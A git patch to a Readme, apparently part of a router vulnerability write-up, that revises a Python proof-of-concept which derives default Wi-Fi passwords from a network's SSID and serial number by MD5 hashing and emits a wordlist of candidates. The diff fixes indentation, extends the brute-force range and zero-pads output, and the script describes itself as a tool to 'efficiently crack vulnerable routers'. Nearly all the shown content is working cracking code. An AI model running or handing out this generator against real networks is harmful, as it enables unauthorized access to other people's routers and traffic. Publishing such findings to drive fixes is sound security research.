From 353e48ce7376ee7fbfe7a4713aac57487745f9e6 Mon Sep 17 00:00:00 2001 From: nico Date: Wed, 6 May 2020 20:01:57 +0000 Subject: [PATCH] Update 'Readme.md' --- Readme.md | 35 ++++++++++++++++++----------------- 1 file changed, 18 insertions(+), 17 deletions(-) diff --git a/Readme.md b/Readme.md index 3163bd4..8690581 100644 --- a/Readme.md +++ b/Readme.md @@ -493,28 +493,28 @@ With this information we can write a PoC script that can produce a wordlist to e import argparse, base64, hashlib, re def genpwd_longpasswd(oui, serialnum): - def str2md5(string): - m = hashlib.md5() - m.update(string.encode("ascii")) - return m.digest() + def str2md5(string): + m = hashlib.md5() + m.update(string.encode("ascii")) + return m.digest() - #secret1 = "%s-ALCL%s" % (oui, serialnum) - secret2 = "%s-01%u" % (oui, int(serialnum, 16)) + #secret1 = "%s-ALCL%s" % (oui, serialnum) + secret2 = "%s-01%u" % (oui, int(serialnum, 16)) - #md5_secret1 = str2md5(secret1) - md5_secret2 = str2md5(secret2) + #md5_secret1 = str2md5(secret1) + md5_secret2 = str2md5(secret2) - #wanpasswd = base64.b32encode(bytes(bytearray(md5_secret1[:16] + md5_secret2[:3]))).decode("ascii")[:30] + #wanpasswd = base64.b32encode(bytes(bytearray(md5_secret1[:16] + md5_secret2[:3]))).decode("ascii")[:30] - lower = upper = 0 + lower = upper = 0 - for i in range(8): - upper = (lower >> 0x18 | ((upper << 8)&0xffffffff))&0xffffffff - lower = (((lower << 8)&0xffffffff) | md5_secret2[i + 8])&0xffffffff + for i in range(8): + upper = (lower >> 0x18 | ((upper << 8)&0xffffffff))&0xffffffff + lower = (((lower << 8)&0xffffffff) | md5_secret2[i + 8])&0xffffffff - longpasswd = ((upper<<32)+lower)%0x2540be400 + longpasswd = ((upper<<32)+lower)%0x2540be400 - return longpasswd + return longpasswd parser = argparse.ArgumentParser(prog="poc", description="A poc script to efficiently crack vulnerable routers") parser.add_argument("ssid", type=str, help="the ssid to attack") @@ -551,8 +551,9 @@ for s in ssids: serialBytes = args.ssid for r in s.split("[A-F0-9]{4}"): serialBytes = serialBytes.replace(r, "") - for i in range(0xffff): - print(genpwd_longpasswd(oui, "{:04x}{}".format(i, serialBytes))) + for i in range(0xffff + 1): + candidate = genpwd_longpasswd(oui, "{:04x}{}".format(i, serialBytes)) + print(f"{candidate:010}") break ```